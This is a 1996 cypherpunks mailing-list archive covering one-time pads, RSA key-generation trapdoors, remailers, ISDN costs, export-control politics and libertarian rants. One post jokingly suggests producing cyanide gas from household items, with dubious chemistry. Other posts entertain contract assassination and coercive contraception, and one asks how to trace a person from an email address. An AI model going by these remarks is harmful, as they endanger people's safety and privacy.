iQCVAwUBMj4FkG1lp8bpvW01AQFvzAQAlLcZV+zsFfsvGodK7uyJP2hxNgugWpwD
qYV23LgwV2dU5NRb7TPbqhp9Z6R7J5YZ3DnA6QuLnvn0pKVFITIyhcq7Wn3zu4PK
5uQ3slYJof1nT3l79zDA6Xx/2pBUm4IxhYXsrw4z4jQFGWHl28rZ1JpbAWghCRcM
b7JXzqaRnek=
=AbJE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 17 Sep 1996 14:08:37 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: That Evil Internet, Pt. XXIII
In-Reply-To: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.LNX.3.94.960916215930.8583A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, Peter D. Junger wrote:

> Date: Mon, 16 Sep 1996 13:08:20 -0400
> From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: Re: That Evil Internet, Pt. XXIII 
> 

[quote deleted]

> 
> Or one can use the technique my father accidentally discovered when he
> was  in school and wanted to electrolyze water.  He made himself a
> cell out of a broken light bulb (and wired it in series with a good
> light bulb) and then realized that he did not have any sulphuric acid
> lying around to use as a catalyst.  So he used table salt instead.
> 

Don' foget to try Tomato leaves (high CN content) and lysol toilet bowl
cleaner (mostly HCl)

CN+HCl=Gas chamber for those who are un-enlightened.

 --Deviant
You know you've been spending too much time on the computer when your
friend misdates a check, and you suggest adding a "++" to fix it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Tue, 17 Sep 1996 13:44:12 +0800
To: remailer-operators@c2.org
Subject: WinSock Remailer Now Accepting Only PGP Encrypted Messages
Message-ID: <199609170203.WAA113002@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

Effective immediately, the WinSock Remailer (operating at 
winsock@c2.org) will now accept only PGP encrypted messages.
All incoming messages (with the exception of messages with
subject headers of help, remailer-help, remailer-stats, and
remailer-key) must now be encrypted with the public key for
winsock@c2.org.  All other messages will be rejected.

Regards,

Joey Grasty (jgrasty@gate.net)
Jim Ray (liberty@gate.net)
WinSock Remailer Operators

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 17 Sep 1996 13:54:09 +0800
To: "David K. Merriman" <merriman@amaonline.com>
Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
In-Reply-To: <199609161705.KAA26825@toad.com>
Message-ID: <Pine.LNX.3.94.960916220357.8583B-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, David K. Merriman wrote:

> Date: Mon, 16 Sep 1996 10:05:27 -0700 (PDT)
> From: "David K. Merriman" <merriman@amaonline.com>
> To: cypherpunks@toad.com
> Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
> 
> To: cypherpunks@toad.com
> Date: Mon Sep 16 12:05:17 1996

[usefull stuff rm'd]

> >
> >       The phrase easy-to-use should not appear in proximity to one
> > time pad, except in the context 'Easier key management than a one time
> > pad!"
> >
> 
> I would also suggest that the generation of OTP 'pads' for users is
> *highly* questionable. Who else is getting a copy of them, assuming they're
> even valid?
> 

Not to mention, the basic flaw of OTP.. if you have the only copy of the
key, and the key is non-repetitive, how do you send the key to another
person without being just as insecure as not encrypting it in the first
place... almost any OTP claims are gonna be snake oil.

 --Deviant
"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 17 Sep 1996 13:24:06 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: 56 kbps modems
In-Reply-To: <199609162239.IAA24591@mac.ce.com.au>
Message-ID: <199609170214.WAA20862@nrk.com>
MIME-Version: 1.0
Content-Type: text


craigw@dg.ce.com.au sez:
> 
> That I realize that baud and bit/sec are not the same, but I feel you would
>  have a hard time getting a 56k modem to work on a line that does not 
> support 28.8k fully, let alone 33.6k. 

I'm trying to guess on the magic at work.
Note that the far end must be a PRI. I wonder if they do some
guessing as to the quantization points, then iterate.

Also note there's no mention of the hype-writer's old friend,
compression.
-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu>
Date: Tue, 17 Sep 1996 14:57:25 +0800
To: Jay Gairson <erp@digiforest.com>
Subject: Re: 56 kbps modems
In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch>
Message-ID: <v03007801ae63b4a060c1@[204.221.10.210]>
MIME-Version: 1.0
Content-Type: text/plain


>Speaking of ISDN, how many people, can afford to have a personal ISDN
>line in there house?  And then afford to connect to something/someone
>else on a next to permanent basis monthly?

As I write this message I'm in the last day of my ISDN service for now.
When I was doing independent consulting work I installed ISDN at my office.
This was to facilitate connectivity to work in California from Minnesota.
After taking a job working for a company locally in Minneapolis I succumbed
to the temptation of installing ISDN at my home and moved my Combinet
router home. I won't deny that I'll be giving up considerable convenience
since the ISDN connection has the ability to come up quickly and
automatically as I send packets to external destinations (that's in theory,
your mileage can vary considerably). But the price per month is ridiculous
for the marginal improvement in connectivity I get over my U of M account
that only costs me about $100 per year. For the price I'm paying for ISDN
Internet connectivity I could buy 32 meg of memory or a gigabyte drive
every month.

The driving force in my decision is the continuing improvement in modem
speeds. When I started with ISDN, my modem speed was 9600 and plenty
finicky at that. Now you can get 33.6 modems for less than $200.

_________________
Steve Bryan
sbryan@gofast.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Sep 1996 16:50:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <ae636b16010210041dfe@[207.167.93.63]>
Message-ID: <Pine.3.89.9609162221.A17615-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 16 Sep 1996, Timothy C. May wrote:
> 
> -- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected
> "soon"

Its Clipper IV. It will take the form of a bill introduced by the USG later
this Fall.

> It seems that several of these announcements are happening at the same
> time, which I doubt is coincidental.

Nothing coincidental about it. The USG, through its front man Al Gore, 
has used time honored "divide and conquer" techniques to get the industry 
leaders to support their fascist agenda by promising to let them off 
easy under the future rules. For crying out loud, CyberCash, to give one 
example, touts in all their recent presentations how they have compliance 
with regulations that don't even exist yet built into their system.

Meanwhile, HP, TIS, IBM, and others have made a deal to sell their 
children's birthright for fast track single DES export.

I read some five newspaper articles on export control/GAK in the last few 
days. All mentioned as a matter of fact that GAK will be part of 
lightened export controls. None questioned the connection between 
domestic GAK and foreign exports. The worst of these articles, in the 
Sunday SF Chronicle, mentioned as the only defenders of non-GAK 
encryption hackers by the name of "Black Knight", etc. who were quoted as 
having no explanation for the dichotomy between "information wants to be 
free" and "I don't want the Feds to read my email".

It is a done deal,

--Lucky, who told you this three years ago.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 17 Sep 1996 17:01:11 +0800
To: mac-crypto@thumper.vmeng.com
Subject: Re: Gaining trust in OCO crypto code
Message-ID: <199609170523.WAA20766@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree with Norm's points.

At  6:59 PM 9/16/96 -0700, Norman Hardy wrote:
>At 3:06 PM 9/12/96, Bill Frantz wrote:
>....
>>(2) Key generation.  There are published ways to encode an RSA secret key
>>in the corresponding RSA public key.  A key generation algorithm which only
>>uses 32 bits of the random number would be hard to detect, but easy to
>>break by one who knew its secret.  You have to be able to examine in detail
>>how keys are generated.
>
>Actually if you generate 100,000 RSA keys with the algorithm the birthday
>effect says that
>you will have some collisions. Of course even 100,000 key generations takes
>a long time.

This statement was not as clear as I wish I had been.  The trap door in RSA
key generation is sufficient to require careful examination of the source
for any RSA key (unless you can take the out Norm suggests as):

>If random number generation is specified not to be integral to RSA key
>generation, then two or more untrusted programs, from mutually hostile
>sources, can generate your RSA key if they yield the same output from the
>same input. In paranoia situations I would rather trust my keyboard random
>than an algorithm chosen by my enemy.

When I started discussing using only 32 bits of the random number, I was
thinking of random session keys such as PGP generates for its IDEA cypher. 
I agree you could detect a small number bits being used to generate these
keys by a birthday attack.  However, most systems make sure these keys are
never revealed outside the system (to preserve the secrecy of the
messages).  It is not easy to do a birthday audit of e.g. PGP session keys.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 17 Sep 1996 13:09:09 +0800
To: jbash@cisco.com (John Bashinski)
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
In-Reply-To: <199609162039.NAA10136@mort>
Message-ID: <199609170335.WAA23977@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Bashinski wrote:

| > Well IPSec provides for authentication of endpoints which would
| > identify the syn attacker.
| 
| Only if the attacker were so stupid as to put in valid authentication
| data identifying herself. 
| 
| I think IPSEC would allow you to throw away the SYNs without processing
| them and without putting anything in your incoming connection queue. On the
| other hand, you'd have to do all the authentication protocol and
| computation for each packet in order to determine that it was bogus. I can
| see where that could lead to a still worse denial-of-service attack if your
| IPSEC code wasn't properly written.

	This is not correct.  IPsec requires key negotiation, which
takes place as or after a connection starts.  (Photuris has a system
where a new connection requires a cookie be traded before any
expensive works gets done.  It does not avoid all work.)

	Peter DaSilva, in a posting to firewalls, suggested that
routers turn on record route on packets with SYN set.  My initial
reaction, that the core doesn't have the CPU, and the leafs will never
deploy, turns out to be wrong; the big providers can make it a
condition of connecting to them that this be done, and the problem of
non-existant return addresses substantially diminishes as soon as
cisco releases the software.  The core routers don't change, since
they are busy; the leafs do, since they need to connect to the core.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 17 Sep 1996 16:15:03 +0800
To: hallam@ai.mit.edu
Subject: Re: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID: <960916.231154.4N4.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, hallam@ai.mit.edu writes:

[ a 'don't call' list of email addresses suggested ]

>         Of course I don't for a moment imagine that this will
> be 100% effective. 

I think the figure you're looking for is closer to 0% than 100%

> Without government regulation there will
> always be slimeballs who send mail to people who don't want it.

If you remove the first three words of that sentence, I agree 100%.  If
you replace the first word with "With", I also agree 100%.  Regulations
aren't the answer.  Slimeballs don't care if there are rules.

Furthermore, regulations for spam mean enforcement procedures.  Looks
like GAE is the only way to do it.  Howzabout you can only send mail
through a USPS gateway?  Wouldn't that make it easy?

{for the acronym-impaired, the E stands for email.  the sarcasm-impaired
probably already hit delete}

>         The advantage of this scheme is that it would mean that
> the spam industry can avoid regulation pressure and they can
> deflect criticism. Meanwhile recipients of unwanted spam have 
> a legitimate beef.

You're asking marketing concerns to proactively limit their coverage in
the absence of legislation or regulation.  History suggests it would be
less than completely effective.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj4n0Bvikii9febJAQGfEgQApg8urK9TpWxfggZTRNdvvHY0rYptrJyV
zvcRjgcgQsB2aca2TekXNtiG/h6blfey46sdVTX2bpZFoC8nnSDn8fVikiG7epwo
xuR5Zr5mGQiUwr+hMWxGIHf79BMuRAwahFQRXTroPK8Wo82nrVKamuK0qoXm+c++
kGugOkYMtHc=
=dIo2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 17 Sep 1996 16:56:29 +0800
To: cypherpunks@toad.com
Subject: Re: Redundancy in XOR encryption
In-Reply-To: <842896374.27768.0@fatmans.demon.co.uk>
Message-ID: <323E2C6A.7423@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I have a question I hope someone here might be able to answer:
> 
> As the method of cryptanalysis of XOR (Ie. index of coincidence)
> relies on redundancy in the plaintext, would the following be strong:
> 
> Compress P to get perfect compression (ie. 0 redundancy)
> Encrypt F (the compressed text) using a repeated key XOR
> 
> of course this is all rather theoretical as there is no such thing as
> perfect compression, but I just thought it might be interesting to
> see if this is indeed strong, superficially it appears so to me...
> 

Paul:
   I think that if the cryptanalyst knows that F has zero redundancy
that he can run searches from 0 to n bits for the key and have
the computer flag solutions that have zero redundancy.  

   I also think that a perfectly compressed file would have a relative
entropy value close to one also, hence the computer could flag possibles 
that have both characteristics.

   Hence, instead of searching for plaintext by counting coincidences,
we are searching the decrypts for solutions that have zero redundancy
and a relative entropy value close to one.  How many solutions will
have both these qualities?  I don't know.  But if the compression method 
is known, brute force will be tried, and only having to try to 
decompress (read) data that has the resultant characteristics
of compressed information will speed things up by quite a bit.

   Others may disagree with my thought-experiment and my approach,
but I think this is quite possible ... even to persons with limited
computing resources.

   Brian Durham
   bdurham@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 17 Sep 1996 19:14:26 +0800
To: Jay Gairson <erp@digiforest.com>
Subject: Re: 56 kbps modems
Message-ID: <199609170721.AAA22844@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 16 Sep 1996, Jay Gairson wrote:
>> Speaking of ISDN, how many people, can afford to have a personal ISDN 
>> line in there house?  And then afford to connect to something/someone 
>> else on a next to permanent basis monthly?

It's Phone Company Dependent.  Here in Pac Bell territory,
an ISDN phone line costs about 2.5 analog phone lines,
and gets you two phone lines plus some signalling.
Connection costs are free at night, and 1 cent/minute daytime.
That may change - the phone company is appalled that all these
computer people interpret the phrase "free at night" as meaning
"it's _free_ at night", so their holding time predictions were bogus :-)
Night is defined as 7pm-7am for ISDN.  ISDN-equipped ISPs start at
about $30/month; don't know if that's unlimited connect time or not.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 17 Sep 1996 19:43:06 +0800
To: hallam@ai.mit.edu
Subject: Re: SPL -- Suspicious Persons List
Message-ID: <199609170721.AAA22857@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:19 AM 9/16/96 -0400, you wrote:
>The Tories put an exclusion into the act deliberately to cover the
>Ecconomic League. Only record which are kept on computer are covered.
>The Ecconomic League deliberately keeps all its records on paper to
>avoid the act.
....
>This is the same government which used MI5 to monitor the activities of 
>the peace movement and which used 5000 crack troops to evict 50 elderly
>women from land they wanted to turn into a missile base. Whether you
>agree or disagree with the policies the methods sound very much like those
>of Hoover at the FBI with a strong dose of Nixon thrown in.

Yeah.  The Los Angeles Police Department, and to some extent many
police departments that once had "Red Squads" chasing "Communists",
doesn't have any records of who's a commie and who's been caught in 
bed with whom or what or caught stealing what from whom,
and very few records of who's been shoving what else up their nose.
However, there are a number of cops who have file cabinets in
their garages at home, or who these days have personal computers,
often with BBSs.  And they talk to their friends, and maybe share
the material in their file cabinets and PCs.  None of the City's business.

I've met four gentlemen from the Philadelphia Red Squad - I went out
and offered them coffee after they'd spent the day lurking in a car
outside an anarchist convention I was at a couple years back.
They'd brought their own, and were set for the next couple hours :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 17 Sep 1996 19:36:27 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <199609170722.AAA22919@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 9/16/96 -0400, The Deviant <deviant@pooh-corner.com> wrote:


>Not to mention, the basic flaw of OTP.. if you have the only copy of the
>key, and the key is non-repetitive, how do you send the key to another
>person without being just as insecure as not encrypting it in the first
>place... almost any OTP claims are gonna be snake oil.

The way you send OTPs to people securely is to use couriers with
briefcases handcuffed to their arms, or whatever level of physical
security you need.  The kinds of things software packages can help with are
providing a friendly user interface for getting the next N bits
out of the pad and trashing them after use, keeping track of where
you were in the pad, handling the different pads you use to communicate with
different people, driving the robot arm that drops the tape into the
shredder, etc.  Slightly less trustably, they can be used to help
generate a pad by crunching down the data from your hardware random
number generators, and perhaps emailing Geiger Counter data to the
Safety Department after rounding to the nearest order of magnitude.

Somebody else wrote:
>> I would also suggest that the generation of OTP 'pads' for users is
>> *highly* questionable. Who else is getting a copy of them, assuming they're
>> even valid?
        Definitely - that concept loses big time.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 17 Sep 1996 20:52:35 +0800
To: gnu@toad.com
Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
Message-ID: <199609170744.AAA07272@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


When:	Friday, September 20, 1996, 11:45AM (hearing starts at Noon)
Where:	Federal Building, 450 Golden Gate Avenue, San Francisco; Judge
	Marilyn Hall Patel's courtroom upstairs.  (two blocks east of
	Van Ness Avenue and Golden Gate Avenue, in the Civic Center
	neighborhood)
What:	Dan Bernstein's case to declare the export controls
	unconstitutional will hold a hearing in which the judge will
	cross-examine both Dan's lawyers and the government's lawyers,
	to decide whether to strike down the ITAR and AECA as
	unconstitutional, throw out the case, or do something in
	between.
Who:	me, Dan's lawyers, NSA & State & Justice dept lawyers, the
	press, and as many cypherpunks and friends-of-encryption as
	will show up.  Don't forget your costume!  Formal dress is
	strongly recommended; you're going to court, remember!
Why:	To see justice in action; to hang out with your friends; to be
	there while cryptographic history is made; to get your picture
	in the Feb '97 Wired Japan.
PS:

Date: Mon, 16 Sep 1996 19:30:29 -0700 (PDT)
To: gnu@toad.com
Subject: I've got "go ahead" from my editor
From: Rika <rika@well.com>

...
I have read about "cypherpunk dress up day" and found it a good 
oppotunity to let Japanese reader of Wired know about law suit and 
circumustance of encription exporting, as well as actual activity of 
cypherpunk people.  So far, "cypherpunk" is more like just a image/notion 
 than actual living people to Japanese.

If I can take a couple of group pictures after the court, I can develop 
an article for their Feb '97 issue.

I hope it is ok with you and lots of lots of people show up this friday!

Rika
...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$B3^86(J $BMx9a(J        $B")(J183 $BEl5~ETI\Cf;TGr;eBf#6(J-13-13
Rika Kasahara  POBox 25427, Los Angeles, CA 90025
Voice:+1-310-478-0653       Fax  :+1-310-478-0493




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 17:15:56 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: Risk v. Charity (was: RE: Workers Paradise. /Political rant).
In-Reply-To: <v02130504ae6362385951@[10.0.2.15]>
Message-ID: <Pine.SUN.3.94.960917010325.27534A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, Steve Schear wrote:

> >On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn <unicorn@schloss.li> wrote:
> >
> >Remember the original purpose of social security.  A government fund which
> >was self sustaining because it only gave out what was put in and gained by
> >investment.
> 
> Not quite.  You'll remember that SS was pitched to the masses as such
> during the Great Depression, but its true purpose was to allow older
> workers to quickly retire and make room for the largely unemployed men in
> their prime, family raising, years.

It became this, yes, but the original concept (at least according to the
legislative history) was as I represent above.

> 
> >
> >> A social safety net is simply a form of health and life
> >> insurance. Statistical arbitrage if you will.
> >
> >Yes, but not for the reasons you would cite.  Social safety nets prevent
> >rioting by the lower classes, revolution and general civil disorder
> >because they appease the masses.  Indeed this is a form of health and life
> >insureance for the middle and upper classes.
> 
> No doubt.  See my previous comment.

[...]

> >Spreading the risk, by itself, does NOT reduce cost.  You must properly
> >PRICE risk.
> >
> >This is the distinction between insurance and welfare.
> 
> Right on!

I forgot to mention that welfare and free health insurance plans do not
SPREAD risk either.  They concentrate the risk of the entitlement eligable
population including those able to pay down onto the smaller group of only
those who earn an income substantial enough to contribute.

Those who can pay in are effectively burdening the risk of those who
cannot as well as themselves, instead of just themselves.

> PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
> ---------------------------------------------------------------------
> Snoop Daty Data           | Internet: azur@netcom.com
> Grinder                   | Voice: 1-702-655-2877
> Sacred Cow Meat Co.       | Fax: 1-702-658-2673
> 7075 W. Gowan Road, #2148 |
> Las Vegas, NV 89129       |
> ---------------------------------------------------------------------
> 
> Just say NO to perscription DRUGS.
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 16:18:19 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IBM_gak
In-Reply-To: <eg5cuD4w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.960917011314.27534C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Lucky Green <shamrock@netcom.com> writes:
> > Aparently, Al Gore's recent phone calls to everybody who is anybody in the 
> > industry have paid off. After HP, TIS, and other unnamed parties, now IBM 
> > is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to 
> > a PKI near you.
> 
> Apparently, senile Tim May (fart) is a Clinton administration troll planted
> here to sabotage any discussions of actual crypto work and to flood this
> mailing list with lies and personal attacks and to make it unusable.

If so, it would seem you fell for it and failed to resist the temptation
to type the word "fart" out- yet again.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 16:31:35 +0800
To: David Wagner <daw@cs.berkeley.edu>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609162254.PAA05380@joseph.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.94.960917011441.27534D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, David Wagner wrote:

> In article <Pine.3.89.9609152124.A20702-0100000@netcom9>,
> Lucky Green  <shamrock@netcom.com> wrote:
> > On Sun, 15 Sep 1996, Dale Thorn wrote:
> > > Just a comment: "The world population really should go back to around 
> > > one billion", etc. And how could we achieve that without severe govt. 
> > > oppression, one wonders?
> > 
> > Quite simple. End all food and medical aid to developing countries paid 
> > for with money stolen at gunpoint from our citizens. Or make Norplant 
> > implants the condition for financial/in kind aid. Both US and 
> > abroad.
> 
> Why stop there?
> 
> Make biometric ID implants the condition for welfare and financial aid, so
> we can track them in case they spend it on (gasp!) donations to the Libertarian
> party.
> 
> Government scholarships for education and research?  Better wiretap their
> phones & emails, in case the recipients use the scholarships to work on strong
> non-GAKed cryptography.

What, pray tell, does the above have to do with Mr. Green's point?

> 
> Hell, folks are also taking advantage of government money every time they
> step foot on a park or government road: might as well require citizen-units
> to escrow their identity and confiscate their guns as a condition of usage.
>

And this?  Mr. Green hardly advocated an authortarian regime, quite the
contrary, he simply advocated one which refused to hand out money to every
outstretched hand.

> ``Buckle your thought-escrow-unit, it's the law!''

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 17 Sep 1996 16:57:39 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: Spam blacklist project
In-Reply-To: <199609170200.WAA13918@osceola.gate.net>
Message-ID: <9609170603.AA03193@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Well if some people find it amazing that there are people out there
who agree with the 98.8% of people who did not vote Libertarian at the
last election then so be it.

It might have occurred to you but if an industry gets its act together
and provides itself with a fig leaf it gets regulated a lot less than
if it says "up yours we don't believe you have the right". 

If it wasn;t for knowing how inane peole are on the net I would think the Hi
Spammer to be an agent provocateur. Sending spam with a gratuitous "you
can't stop me" message attached is an invitation in itself. The terrorists
helpgroup stuff at his site hardly helps his cause either. All in all he
looks like a custom made provocation to show to some senator like Exon
and get a crackpot bill passed PDQ. Are people sure the guy isn't a front 
being run by some disgruntled tele-marketing or junk mail house that feels
it is in danger of loosing business?

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 18:01:09 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
In-Reply-To: <v02130503ae6361b73b06@[10.0.2.15]>
Message-ID: <Pine.SUN.3.94.960917025301.27534G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996, Steve Schear wrote:

> Someone wrote:

> >The problem is that assasination rarely leads to the installation of
> >a government that is any better. In most cases it gets worse.

[...]

> We've all heard these arguments, but are they true?  Who says so, and how
> can they be certain? Jim's suggestion has never, to my knowledge, been
> tried on a consistant, large, scale.  When all conventional alternatives
> have been tried and fail, what have we or the starving children got to
> lose?

I think "Lord of the Flies" answers this question quite well.

> Is it legal for citizens of the U.S. to engage in contract killing of
> foreign military, politations, etc?  How about U.S. or foreign non-profits?

As to the first, yes.  (There are several anti-mercenary statutes on the 
books)  As to the second, I don't understand the question.

[...]

> -- Steve

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 17 Sep 1996 13:07:03 +0800
To: cypherpunks@toad.com
Subject: Searching an email address
Message-ID: <199609170200.EAA13318@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  I have been trying to find out info re: someone
via his email address and didn't find anything.
The server is telaver.com, e.g., name@telaver.com
   Any suggestions outside of the usual search
machines?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 07:58:32 +0800
To: cypherpunks@toad.com
Subject: Wealth Tax vs. Capital Gains Tax Reduction
Message-ID: <ae6440c1040210045195@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I've been thinking a lot about the prospects of a "wealth tax," or "asset
tax," in the U.S. With the stock market averages at record levels (and,
hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level),
and with increasing fractions of people's overall net worth tied up in
equities, bonds, houses, property, etc., it may be that the looters will
take a more serious look at taxing people's overall wealth, e.g., the 5% of
net worth per year that some countries have.

(At the same time, there is also a chance that the tax on capital gains
will be greatly reduced or even possibly eliminated, also as some countries
such as Japan have already done.)

The conundrum is this: so long as stocks, bonds, and other holdings are not
taxable while unsold, and so long as large amounts of private pension funds
and whatnot are flowing into equities, this wealth is "unreachable" to the
government tax collectors. Further, much of this wealth is "locked" by the
high marginal tax rates on capital gains (35-40%, depending on which state
one lives in, on so-called "tax preference items," etc.) Many people will
not sell assets if they have to pay 35-40% to the tax man if they sell, but
nothing if they just sit on the asset and watch it go up in value.

(Obviously, the assets get sold eventually. But many people will choose to
simply not worry about the heavy taxes _this_ year, and delay selling 'til
some future date. They may also think the capital gains rates will go down,
